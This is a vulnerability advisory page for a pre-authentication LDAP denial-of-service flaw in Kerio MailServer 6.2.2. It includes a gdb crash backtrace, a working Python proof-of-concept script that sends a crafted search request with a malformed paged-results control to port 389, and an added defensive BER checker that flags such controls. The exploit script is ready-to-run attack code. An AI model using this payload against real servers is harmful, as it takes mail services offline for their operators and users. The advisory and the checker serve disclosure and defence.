
Kerio MailServer 5.x/6.x Remote LDAP Denial of Service Vulnerability

01 Jul 2014 00:00:00 | Reported by: Root | Type: seebug | Source: www.seebug.org


Source: http://www.securityfocus.com/bid/21091/info

Kerio MailServer is prone to a denial-of-service vulnerability due to a flaw when handling malformed network traffic.

Successful exploits will result in denial-of-service conditions.

#!/usr/bin/env python
# kms1.py - Kerio MailServer 6.2.2 preauth remote DoS
# fixed in Kerio MailServer 6.3.1
#
# Copyright (c) 2006 Evgeny Legerov
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.


"""
gdb backtrace:
# gdb -q ./mailserver core.18450
(no debugging symbols found)
Using host libthread_db library "/lib/libthread_db.so.1".
Reading symbols from shared object read from target memory...(no debugging
symbols found)...done.
Loaded system supplied DSO at 0xb76000
Core was generated by `/opt/kerio/mailserver/mailserver /opt/kerio/mailserver'.
Program terminated with signal 11, Segmentation fault.
...
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
#0  0x0821c444 in LDAPSearchRequest::parsePagedResults ()
(gdb) bt
#0  0x0821c444 in LDAPSearchRequest::parsePagedResults ()
#1  0x0821c387 in LDAPSearchRequest::setAll ()
#2  0x08093d8a in Ber::getSearchRequest ()
#3  0x08205e48 in LDAPServer::search ()
#4  0x08207de0 in LDAPServer::server ()
#5  0x08207e2e in ldap_handler ()
#6  0x0841be13 in KServerTask::handler ()
#7  0x082033c6 in KThreadPool::workerThread ()
#8  0x086ee7b6 in kerio::tiny::thread ()
#9  0x00772b80 in start_thread () from /lib/libpthread.so.0
#10 0x00558dee in clone () from /lib/libc.so.6
(gdb) x/i $eip
0x821c444 <_ZN17LDAPSearchRequest17parsePagedResultsE13LDAPExtension+12>:      
mov    (%eax),%edx
(gdb) i r eax
eax            0x449    1097
"""

from socket import *

host = "localhost"
port = 389

s =  "\x30\x82\x04\x4d\x02\x01\x26\x63\x82\x04\x46\x04\x00\x0a\x01\x02"
s += "\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0b\x6f\x62"
s += "\x6a\x65\x63\x74\x43\x6c\x61\x73\x73\x30\x02\x04\x00\xa0\x82\x04"
s += "\x20\x30\x82\x04\x1c"
s += "\x01"*1024
s += "\x16\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x31"
s += "\x33\x35\x35\x36\x2e\x31\x2e\x34\x2e\x34\x37\x33\x01\x01\x00\x04"
s += "\x00"

sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host,port))
sock.sendall(s)
sock.recv(10000)
sock.close()
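
For defenders, a structural check on the request's controls shows what is malformed about this message: the element where the control's type should be is not an OCTET STRING. The following is an added example, not part of the original advisory or script; the function names and the two short sample messages are constructed for illustration, and it assumes the RFC 4511 Control layout (OCTET STRING controlType, optional BOOLEAN criticality, optional OCTET STRING value).

```python
# Added example, not from the original page: pre-parse check of LDAP request controls.
OCTET_STRING, BOOLEAN, SEQUENCE, CONTROLS, SEARCH_REQUEST = 0x04, 0x01, 0x30, 0xA0, 0x63
SAMPLE_GOOD = bytes.fromhex("300e 020101 4200 a007 3005 0403312e32")  # constructed: valid control
SAMPLE_BAD = bytes.fromhex("300c 020101 4200 a005 3003 010101")  # constructed: BOOLEAN first

def read_tlv(buf, pos, end):
    """Decode one BER TLV at pos; return (tag, value_start, value_end)."""
    if pos + 2 > end:
        raise ValueError("truncated TLV header")
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:  # long form: the next n octets hold the length
        n = length & 0x7F
        if not 1 <= n <= 4 or pos + n > end:
            raise ValueError("unsupported or truncated length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > end:
        raise ValueError("length runs past enclosing element")
    return tag, pos, pos + length

def children(buf, start, end):
    """List the (tag, value_start, value_end) TLVs that fill buf[start:end]."""
    out = []
    while start < end:
        out.append(read_tlv(buf, start, end))
        start = out[-1][2]
    return out

def control_findings(msg):
    """Return a list of structural problems in the controls of one LDAPMessage."""
    findings = []
    try:
        tag, vs, ve = read_tlv(msg, 0, len(msg))
        top = children(msg, vs, ve) if tag == SEQUENCE else []
        if len(top) < 2:
            return ["not an LDAPMessage"]
        scope = top[2:]  # controls follow messageID and protocolOp
        if top[1][0] == SEARCH_REQUEST:  # also check a [0] placed after the 8
            scope += children(msg, top[1][1], top[1][2])[8:]  # search fields, as on this page
        for _, cs, ce in [c for c in scope if c[0] == CONTROLS]:
            for seq_tag, s, e in children(msg, cs, ce):
                tags = [t for t, _, _ in children(msg, s, e)]
                if seq_tag != SEQUENCE or tags[:1] != [OCTET_STRING]:
                    findings.append("control does not start with an OCTET STRING controlType")
                elif tags[1:] not in ([], [BOOLEAN], [OCTET_STRING], [BOOLEAN, OCTET_STRING]):
                    findings.append("unexpected elements after controlType")
    except ValueError as exc:
        findings.append("malformed BER: %s" % exc)
    return findings
```

A front end that rejects any message with a non-empty findings list never hands the malformed control to the server's own parser.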
                              
